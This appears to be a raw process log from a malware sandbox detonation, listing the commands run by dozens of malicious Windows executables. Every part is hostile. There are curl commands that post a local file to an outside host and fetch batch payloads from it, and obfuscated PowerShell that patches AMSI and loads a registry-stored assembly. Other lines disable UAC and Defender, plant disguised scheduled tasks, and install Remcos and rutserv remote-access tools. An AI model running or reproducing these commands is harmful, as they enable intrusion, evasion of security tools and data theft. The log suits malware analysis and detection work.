C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe
"C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe"
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe
"C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c type "C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\AppData\Local\Temp\a\RMX.exe
"C:\Users\Admin\AppData\Local\Temp\a\RMX.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
C:\ProgramData\Remcos\remcos.exe
C:\ProgramData\Remcos\remcos.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe
"C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe"
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpF392.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpF392.tmp.bat
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\Windows\System32\certutil.exe
"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmpF7BB.tmp"
C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"
C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe
"C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del gU8ND0g.exe
C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe
"C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe"
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\KNG4EUSR1N7Y" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\AppData\Local\Temp\a\888.exe
"C:\Users\Admin\AppData\Local\Temp\a\888.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\50to.exe
"C:\Users\Admin\AppData\Local\Temp\a\50to.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:sUgALBJuddPL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$IGdgGyUmBjfsmw,[Parameter(Position=1)][Type]$ontOmaiHFB)$yzlTtpZFAcy=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+'l'+''+'e'+''+[Char](99)+''+[Char](116)+'ed'+[Char](68)+'e'+[Char](108)+'eg'+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+'M'+''+'o'+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType('MyD'+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+'d'+','+'A'+''+[Char](110)+'siC'+'l'+''+[Char](97)+''+'s'+''+[Char](115)+','+'A'+''+[Char](117)+'t'+'o'+''+[Char](67)+'la'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$yzlTtpZFAcy.DefineConstructor(''+[Char](82)+'T'+'S'+''+'p'+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+'Sig'+','+''+[Char](80)+'ub'+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$IGdgGyUmBjfsmw).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+'t'+[Char](105)+'me'+[Char](44)+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+''+'e'+'d');$yzlTtpZFAcy.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+','+''+'H'+''+[Char](105)+'d'+[Char](101)+'B'+[Char](121)+''+'S'+''+'i'+'g'+','+''+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+'t,'+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l',$ontOmaiHFB,$IGdgGyUmBjfsmw).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+'e'+','+[Char](77)+''+[Char](97)+'n'+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $yzlTtpZFAcy.CreateType();}$fNRgnEVXOxQnB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'te'+'m'+''+'.'+''+[Char](100)+''+[Char](108)+'l')}).GetType('M'+'i'+'c'+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+'n'+''+'3'+'2'+'.'+'Un'+[Char](115)+''+'a'+'f'+'e'+'N'+'a'+''+'t'+'i'+[Char](118)+'e'+[Char](77)+'et'+[Char](104)+'o'+[Char](100)+'s');$lPAfvfzUHAVHue=$fNRgnEVXOxQnB.GetMethod('Ge'+[Char](116)+''+[Char](80)+''+'r'+'o'+[Char](99)+''+'A'+''+[Char](100)+'d'+[Char](114)+''+[Char](101)+''+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+'S'+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$dkUdZUpgzdHignBPXhF=sUgALBJuddPL @([String])([IntPtr]);$VXYlvhhMRMvfYvsmmScHGK=sUgALBJuddPL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LTjVZZybjPM=$fNRgnEVXOxQnB.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+'le'+[Char](72)+'a'+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+''+'2'+'.'+[Char](100)+''+[Char](108)+''+'l'+'')));$IopBYVcHjeMVGT=$lPAfvfzUHAVHue.Invoke($Null,@([Object]$LTjVZZybjPM,[Object]('L'+'o'+'a'+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$TmZcxpZXRGVjhoUXr=$lPAfvfzUHAVHue.Invoke($Null,@([Object]$LTjVZZybjPM,[Object]('Vi'+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+'r'+'o'+'t'+'e'+'ct')));$yjifdGV=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IopBYVcHjeMVGT,$dkUdZUpgzdHignBPXhF).Invoke('a'+[Char](109)+'si'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$ceWPqOfkVGHGkWGRY=$lPAfvfzUHAVHue.Invoke($Null,@([Object]$yjifdGV,[Object]('Am'+[Char](115)+'i'+[Char](83)+''+'c'+''+'a'+'n'+'B'+''+[Char](117)+'ff'+'e'+''+'r'+'')));$mmTFvhlYfG=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TmZcxpZXRGVjhoUXr,$VXYlvhhMRMvfYvsmmScHGK).Invoke($ceWPqOfkVGHGkWGRY,[uint32]8,4,[ref]$mmTFvhlYfG);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ceWPqOfkVGHGkWGRY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TmZcxpZXRGVjhoUXr,$VXYlvhhMRMvfYvsmmScHGK).Invoke($ceWPqOfkVGHGkWGRY,[uint32]8,0x20,[ref]$mmTFvhlYfG);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+[Char](84)+''+'W'+''+'A'+'R'+'E'+'').GetValue(''+'r'+'u'+[Char](116)+'s'+[Char](115)+''+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{b67b61a4-c1d7-43c9-b09e-983c1c271dc8}
C:\Windows\system32\lsass.exe
"C:\Windows\system32\lsass.exe"
C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im conhost.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vqmscs.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\net.exe
net session
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 session
C:\Users\Admin\AppData\Local\Temp\a\info.exe
"C:\Users\Admin\AppData\Local\Temp\a\info.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\smfbcb.exe
"C:\Users\Admin\AppData\Local\Temp\smfbcb.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C regedit /s "%SystemDrive%\Windows\SysWOW64\ruts\11.reg
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "%SystemDrive%\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\50.exe
"C:\Users\Admin\AppData\Local\Temp\a\50.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c delete.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
C:\Users\Admin\AppData\Local\Temp\a\SH.exe
"C:\Users\Admin\AppData\Local\Temp\a\SH.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:WvfjhlrrLQSq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$iVrLBmUvkLLBVe,[Parameter(Position=1)][Type]$rIAteYmzUQ)$cESUfquAKZM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+'l'+[Char](101)+'d,'+[Char](65)+''+'n'+'s'+[Char](105)+'C'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$cESUfquAKZM.DefineConstructor('R'+'T'+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+'a'+'l'+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+''+'H'+''+'i'+''+'d'+''+[Char](101)+''+'B'+'y'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$iVrLBmUvkLLBVe).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+'t'+'i'+'m'+[Char](101)+''+','+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+'d'+'');$cESUfquAKZM.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+'ub'+[Char](108)+''+'i'+''+[Char](99)+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+'S'+''+'i'+''+'g'+',N'+[Char](101)+''+[Char](119)+'S'+'l'+'o'+[Char](116)+''+[Char](44)+''+'V'+'i'+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$rIAteYmzUQ,$iVrLBmUvkLLBVe).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output $cESUfquAKZM.CreateType();}$RadOuNuyghnRC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+''+[Char](100)+'ll')}).GetType(''+'M'+'i'+[Char](99)+''+'r'+''+[Char](111)+''+'s'+''+'o'+''+[Char](102)+''+'t'+'.Wi'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+[Char](97)+''+'f'+'e'+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+'s');$nKvApqmhPpQyVl=$RadOuNuyghnRC.GetMethod(''+'G'+'e'+'t'+''+[Char](80)+''+[Char](114)+'o'+[Char](99)+''+'A'+''+[Char](100)+''+'d'+''+[Char](114)+'e'+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+'b'+'li'+[Char](99)+','+[Char](83)+'t'+[Char](97)+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FUalnmdqnqpqadiFZGV=WvfjhlrrLQSq @([String])([IntPtr]);$OvrtyiQOCOPQnrsSWEkKir=WvfjhlrrLQSq @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$wUfEroNSdFe=$RadOuNuyghnRC.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+''+'o'+''+'d'+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+'d'+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+'n'+''+'e'+'l'+'3'+''+[Char](50)+''+'.'+''+[Char](100)+''+'l'+''+'l'+'')));$wqRFNDuBhhYIqf=$nKvApqmhPpQyVl.Invoke($Null,@([Object]$wUfEroNSdFe,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+'L'+[Char](105)+''+'b'+''+[Char](114)+''+'a'+''+'r'+''+[Char](121)+''+[Char](65)+'')));$YOOGiFzmcxwFQtiSU=$nKvApqmhPpQyVl.Invoke($Null,@([Object]$wUfEroNSdFe,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+'e'+'c'+''+[Char](116)+'')));$eyaffzy=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wqRFNDuBhhYIqf,$FUalnmdqnqpqadiFZGV).Invoke(''+'a'+'ms'+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$IOVJgGfTSaQfoEvgs=$nKvApqmhPpQyVl.Invoke($Null,@([Object]$eyaffzy,[Object]('A'+[Char](109)+''+[Char](115)+'i'+[Char](83)+''+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+'u'+''+'f'+''+[Char](102)+'er')));$twUAddxAbi=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YOOGiFzmcxwFQtiSU,$OvrtyiQOCOPQnrsSWEkKir).Invoke($IOVJgGfTSaQfoEvgs,[uint32]8,4,[ref]$twUAddxAbi);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$IOVJgGfTSaQfoEvgs,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YOOGiFzmcxwFQtiSU,$OvrtyiQOCOPQnrsSWEkKir).Invoke($IOVJgGfTSaQfoEvgs,[uint32]8,0x20,[ref]$twUAddxAbi);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'r'+''+[Char](117)+''+[Char](116)+''+[Char](115)+''+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\SysWOW64\regedit.exe
regedit /s "C:\Windows\SysWOW64\ruts\11.reg
C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe
"C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe"
C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe
"C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "C:\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Users\Admin\AppData\Local\Temp\a\qwex.exe
"C:\Users\Admin\AppData\Local\Temp\a\qwex.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4024 -ip 4024
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 444 -p 5388 -ip 5388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 160
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5388 -s 1448
C:\Users\Admin\AppData\Local\Temp\a\XW.exe
"C:\Users\Admin\AppData\Local\Temp\a\XW.exe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe
"C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe"
C:\Users\Admin\AppData\Local\Temp\a\boleto.exe
"C:\Users\Admin\AppData\Local\Temp\a\boleto.exe"
C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe
"C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\10000520110\123719821238.dll, Main
C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe
"C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe
"C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe"
C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe
"C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe"
C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe
"C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe"
C:\Windows\SysWOW64\WerFault.exe
